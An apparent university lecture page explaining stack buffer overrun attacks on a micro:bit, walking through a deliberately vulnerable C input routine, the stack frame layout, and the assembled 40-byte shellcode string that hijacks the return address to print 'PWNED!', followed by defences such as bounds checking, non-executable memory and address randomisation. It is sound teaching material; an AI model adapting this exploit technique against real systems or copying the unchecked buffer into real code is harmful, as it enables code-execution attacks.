Lecture 7 – Buffer overrun attacks (Digital Systems)

From Spivey's Corner
Jump to: navigation, search

The victim[edit]

One day, an Oxford undergraduate was conscientiously doing his IP1 practical, using C and the micro:bit instead of Scala and some bloated AMD64 machine with gigabytes of RAM. Here is the code that he wrote:

/* getnum -- read a line of input and convert to a number */
int getnum(void) {
    char buf[32];
    getline(buf);
    return atoi(buf);
}

void init(void) {
    int milk[10], total;

    serial_init();

    for (int i = 0; i < 10; i++) {
        int x = getnum();
        milk[i] = x;
        serial_printf("Input %d = %d\r\n", i, x);
    }

    total = 0;

    for (int i = 0; i < 10; i++)
        total += milk[i];
    
    serial_printf("Total = %d\r\n", total);    
}   

That doesn't look too bad, does it? There's a subroutine getnum that reads a line of input and converts it into a number, and the main program uses it to read 10 numbers and store them in an array, printing them out as it does so. Finally, the main program adds together all of the numbers and prints the total. But already this program contains a horrendous bug, which will allow us, by feeding it carefully crafted input, to subvert it and run any code that we like. To show our power, we will force the program to print the string PWNED!.

The flaw in the program is in the interface of the subroutine getline(buf) called from getnum. This takes as parameter (the address of) a character array buf that will be used to store the characters in the line. But disastrously, getline does not know the length of the array it is passed, so cannot check whether the input line is longer than the array. It is this weakness we shall exploit.

Context

This sort of sloppy programming is very common in C. It does little damage if the program is quickly written, used only locally, and quickly discarded. In other contexts, as we'll see, more care is very much needed to avoid security problems. Routines in the C library such as gets – the same as getline here – are rightly deprecated for their unsafety. There's an alternative function fgets(buf, n, fp) that can read from an arbitrary file fp, not just the standard input, but crucially also accepts the maximum number of characters n that will fit in buf.

Mounting the specimen[edit]

We can imagine getline using the serial port to get characters from the keyboard, and then storing them in the array. But to make our experiments easier, let's replace it with a version that replays a canned script.

#define MARK 0x7f

static const char script[];

/* getline -- copy a line of input into buf. */
void getline(char *buf) {
    // Note failure to check the length of buf
    static const char *p = script;
    char *q = buf;

    while (*p != MARK) *q++ = *p++;
    p++; *q = '\0';
}

This routine keeps track of the place we've reached in a fixed array script, and copies the next line from that array into buf, up to the next MARK character. I've chosen MARK to have an unusual value (rather than, say, 0), because we're going to be stuffing in some text later that contains all sorts of weird characters, but not, luckily, the character with code 0x7f. It's hard to type such strange text on a keyboard, and that's part of the reason for replaying canned input. In real life, we can imaging writing an attack program that sends a carefully crafted network packet containing whatever weird bytes are needed.

We can define the script array later in the program, like this:

static const char script [] = {
    '1', MARK,
    '1', '2', '3', MARK,
    '-', '1', '0', MARK,
    '0', MARK,

    0x8a, 0xb0, 0x02, 0x49,
    0x02, 0xa0, 0x88, 0x47,
    0xfe, 0xe7, 0x00, 0x00,
    0x79, 0x01, 0x00, 0x00,
    0x50, 0x57, 0x4e, 0x45,
    0x44, 0x21, 0x0d, 0x0a,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x99, 0x3f, 0x00, 0x20,
    MARK
};

The first few lines contain the numbers 1, 123, -10, 0 – not all of them sensible for the Milk Bill application, but hey! Then comes our carefully crafted input, expressed here as a sequence of 40 hexadecimal constants. Running the program with this input produces evidence of the hack:

Input 0 = 1                                                                    
Input 1 = 123                                                                   
Input 2 = -10                                                                   
Input 3 = 0                                                                     
PWNED!

Planning the attack[edit]

So what are those 40 magic characters, and how were they determined?

First, we notice that there are 40 characters, and the buffer declared locally in getnum has space for only 32 characters. Crucially, the getline subroutine doesn't detect this, and it can't because it knows only the address of the buffer, not its size. Our friend obviously thought 32 characters was plenty for any input number; don't be too hard on him – we've all done the same. The first 32 characters of the line fill up the buffer, and the remaining 8 are written by getline into the space beyond it, overwriting whatever the program was storing there. To understand what is overwritten, and how this leads to subversion of the program, we need to look at the layout of getnum's stack frame.

    +--------------------------------+
    | Return address                 |
    +--------------------------------+
    | One word of padding            |
    +--------------------------------+
    |                                |
    | 8 words for array buf          |
sp: |                                |
    +--------------------------------+

We can deduce the layout of getnum's frame by looking at its code, obtained by disassembling the program.

00000108 <getnum>:
 108:	b500      	push	{lr}
 10a:	b089      	sub	sp, #36	; 0x24
 10c:	4668      	mov	r0, sp
 10e:	f7ff fffe 	bl	d8 <getline>
 112:	4668      	mov	r0, sp
 114:	f7ff fffe 	bl	0 <atoi>
 118:	b009      	add	sp, #36	; 0x24
 11a:	bd00      	pop	{pc}

As you can see, getnum initially saves its return address with push {lr}, then decrements the stack pointer by 36 bytes – that is, the 32 bytes for the buf array, and another 4 bytes it includes because the compiler likes to keep the stack pointer evenly divisible by 8. (This 8-byte stack alignment is irrelevant to the Cortex-M0, but is sometimes needed on bigger chips.) The parameter that getnum passes to getline in r0 is equal to the stack pointer, so we can see that buf is located right where the stack pointer points.

Is it fair to disassemble the target program and use this information to mount our attack? Yes, of course: in real life, we might be attacking a particular release of [a popular web browser], and we can download the code and study it to our heart's content, EULA notwithstanding.

Ok, we will make our attack string contain 32 bytes to fill up the buffer, another four bytes for the word of padding, and then the next four bytes of the string will overwrite the return address of getnum with a value of our choosing. By doing this, we can arrange that when getnum returns, it will be to a place that we can control. We'll choose that place to be the buffer itself, and arrange that the data put in the buffer is the code we'd like to run. But where will the buffer be in memory? We can find that out by running the program on a test machine with the debugger, stopping it in getnum, and writing down the value of the stack pointer. That will allow us to calculate the address of each part of our attack string once it is copied into the buf array by the victim. In a more complicated program, different calls to getnum might be made in different contexts, and there may be several possible values for the stack pointer; here there is only one.

The layout we plan for the attack string is like this:

32 bytes of code
Another 4 bytes of zeroes
Address of the code

There's one more piece of information we need to formulate the attack string, and that's the address of the subroutine serial_printf, which we can use to print our message (and a ransom note). We can find that by disassembling the program or by looking in the map file output by the linker. If our target is open source, we can get all this information freely; if not, we might need to poke about a bit more with a disassembler, but it's not rocket science.

After getline has overwritten the stack frame of getnum, it returns control to getnum as usual. The rest of getnum's body then runs, with a call to atoi that presumably returns 0, having found no digits in the buffer. Then getnum returns to our chosen return address, and the code we placed in the buffer starts to run.

Context

The layout of the stack frame for getnum is typical of many machines. Details will differ: for example, we can expect the return address to appear at different offsets from the start of the buffer. What most buffer overrun attacks have in common is that the return address of a subroutine can be overwritten by overflowing a buffer embedded in the stack frame.

Building a binary[edit]

We could piece together the attack string byte by byte, hardware manual in hand. But it's neater to use the assembler: here's the assembly language source for what we want, including the addresses we determined earlier:

    .syntax unified

    .equ printf, 0x178      @ Address of serial_printf
    .equ frame, 0x20003f98  @ Captured stack pointer value in getnum

    .text
    @@ Our malicious code
attack:
    sub sp, #40             @ Reserve stack space again
    adr r0, message         @ Address of our message
    ldr r1, =printf+1       @ Absolute address for call
    blx r1                  @ Call printf
    b .                     @ Spin forever
    .pool                   @ Place constant pool here
message:
    .asciz "PWNED!\r\n"
    .align 5, 0             @ Fill up rest of buffer

    @@ One extra word of padding
    .word 0

    @@ The return address
    .word frame+1

By the time this code is reached, getnum will have deallocated the stack space that was used for the buffer, so the first task is to adjust the stack pointer, so that when we later call serial_printf, its stack frame will not overwrite our code. Then there is a call that passes the message to serial_printf, for simplicity calling it by first putting its absolute address in a register; the +1 is to mark it as Thumb code.[1] Then the code enters an infinite loop while we wait for the ransom to be sent – in Bitcoin, naturally.

Some details to dispel any mystery:

  • The directive .pool places the constant printf+1 here in memory and fixes up the earlier ldr = instruction to refer to it.
  • The directive .asciz stores the characters of our message, terminated C-style with a zero byte.
  • The directive .align 5, 0 pads the program with zero bytes (0) until its size is a multiple of 32 = 25.
  • Each .word directive contributes a four-byte word to the output of the assembler.
  • The .equ directives give the numeric value of the symbols printf and frame, obtained in earlier experiments.
  • We use a blx reg instruction instead of bl label just because it's marginally inconvenient to determine the displacement for bl, and an absolute address is easier to deal with.

There's a makefile that automates the process of building the demonstration. First, we can assemble the file attack.s into an object file attack.o.

arm-none-eabi-as -mcpu=cortex-m0 -mthumb attack.s -o attack.o

Next, we use objcopy to turn the .o file into a binary image.

arm-none-eabi-objcopy -O binary attack.o attack.bin

Then we can use the hexdump utility to format the binary data as a sequence of hexadecimal bytes

hexdump -v -e '4/1 "0x%02x, " "\n"' attack.bin >attack

The file attack then contains the 40 bytes shown earlier as part of the value of script. I pasted in the text there, but in the demonstration source I used a #include directive to automate the process.

Disassembling the file attack.o shows the correspondence between the input to the assembler and the 40 bytes that make up the attack string. Note that the little-endian byte order means that each word should be read in digit-pairs from right to left.

00000000 <attack>:
   0:	b08a      	sub	sp, #40	; 0x28
   2:	a003      	add	r0, pc, #12	; (adr r0, 10 <message>)
   4:	4901      	ldr	r1, [pc, #4]	; (c <attack+0xc>)
   6:	4788      	blx	r1
   8:	e7fe      	b.n	8 <attack+0x8>
   a:	0000      	.short	0x0000
   c:	00000179 	.word	0x00000179

00000010 <message>:
  10:	454e5750 	.word	0x454e5750
  14:	0a0d2144 	.word	0x0a0d2144
	...
  24:	20003f99 	.word	0x20003f99

To be fair, quite a lot of the 40 bytes are zeroes, which might be ignored or terminate a routine designed to read a line of input, and one of them is even the carriage return character 0x0d, followed by the newline character 0x0a, and they may also not get past the input routine. But most of the zeroes are padding that could be replaced by any character, and it would require only a little ingenuity to devise code that, when assembled, did not contain the other troublesome characters. A subroutine that read a network packet might well have no restrictions on the bytes that the packet could contain.

Defence against the dark arts[edit]

This example shows just how easy it is to write code with accidental vulnerabilities. There are many things that can be done to prevent such vulnerabilities from being exposed.

  1. We could use a programming language that makes it more difficult to pass around the addresses of buffers without also passing and checking their size.
  2. This attack depends on executing code that has been received as data: in the example, that code is stored in the region of memory that is used for the stack. On machines more sophisticated than the micro:bit, it's often possible to forbid executing code from anywhere but the code segment of the program.
  3. Even microcontrollers that have separate address spaces for program and data make it difficult to accidentally execute data as instructions. Nevertheless, there has to be some way of doing it, or such microcontrollers would not be able to update their own firmware under program control, and that is a useful feature.
  4. The attack depended on knowing a couple of addresses – the address of the getnum stack frame and the address of the existing printf subroutine. By randomising the layout of memory for each run of the program, it can be made more difficult to predict where such things will be found.

Linux has some at least of these defenses enabled by default and repeating the attack is rather more difficult.

Lecture 8


  1. That is to say, the blx r1 instruction on bigger ARM processors is capable of switching between Native ARM and Thumb modes, according to the least significant bit in the register r1 – that is the significance of the x in the mnemonic blx. The function serial_printf is in Thumb code, so even on the Cortex-M0, we must carefully keep the processor in Thumb mode when calling it: hence the +1. For the same reason, the return address we plant in place of getnum's original return address also has a +1.

The 64-bit variant of the Intel architecture used in PCs. So called because the instruction set extensions to support 64 bits was first introduced on chips designed by Advanced Micro Devices. Also known as x86_64.

The address of the next instruction after a call of a procedure. When the procedure returns, execution continues from this point.

A register sp that holds the address of the most recent occupied word of the subroutine stack. On ARM, as on most recent processors, the subroutine stack grows downwards, so that the sp holds the lowest address of any occupied work on the stack.

A report produced by the linker, showing what library modules were included in the program, and for each module where in the program image it has been put.

A symbolic representation of the machine code for a program.

An alternative instruction encoding for the ARM in which each instruction is encoded in 16 rather than 32 bits. The advantage is compact code, the disadvantage that only a selection of instructions can be encoded, and only the first 8 registers are easily accessible. In Cortex-M microcontrollers, the Thumb encoding is the only one provided.

A computer with byte-addressed memory is little-endian if the least significant byte of a multi-byte integer in memory is the one with the lowest address, the same as the address of the word itself. Thus on the ARM as conventionally configured, if the integer 0x1a2b3c4d is stored at address 0x1000, then byte 0x1000 in the memory contains 0x4d, byte 0x1001 contains 0x3c, byte 0x1002 contains 0x2b, and byte 0x1003 contains 0x1a. At first, this seems counter-intuitive, until you realise that the real problem is the way we write numbers in everyday life, with the digit worth 100 at the end, and the one worth 10n-1 at the beginning.